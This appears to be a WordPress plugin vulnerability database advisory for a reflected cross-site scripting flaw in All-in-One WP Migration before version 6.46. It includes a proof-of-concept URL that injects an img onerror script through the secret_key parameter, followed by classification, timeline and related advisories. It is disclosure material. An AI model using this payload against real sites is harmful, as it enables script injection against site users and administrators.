WordPress Plugin Vulnerabilities

All-in-One WP Migration < 6.46 - Reflected Cross-Site Scripting (XSS)

Description

All-in-One WP Migration is vulnerable to Reflected Cross-Site Scripting on secret_key parameter.

Proof of Concept

http://example.com/wp-admin/admin-ajax.php?action=ai1wm_status&secret_key="}<img src=x onerror=alert(1)><!--

Affects Plugins

Plugin icon
all-in-one-wp-migration
Fixed in 6.46

References

URL
https://wordpress.org/plugins/all-in-one-wp-migration/#developers

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Submitter
Oways
Submitter twitter
@0w4ys
Verified
No
WPVDB ID
fc104922-b141-43dc-b91e-c9d9518a541c

Timeline

Publicly Published
2017-06-20 (about 6 years ago)
Added
2017-06-21 (about 6 years ago)
Last Updated
2021-03-23 (about 2 years ago)

Other

Published
Title
Published
2015-08-13
Title
Hide My WP <= 4.53 - Stored-Cross Site Scripting (XSS)
Published
2021-05-17
Title
Funnel Builder by CartFlows < 1.6.13 - Authenticated Stored XSS via FB Pixel ID and Google Analytics ID
Published
2022-12-15
Title
404 to Start <= 1.6.1 - Admin+ Stored XSS
Published
2023-01-18
Title
Better Font Awesome < 2.0.4 - Contributor+ Stored XSS
Published
2023-05-15
Title
WooCommerce Composite Products < 8.7.6 - Reflected XSS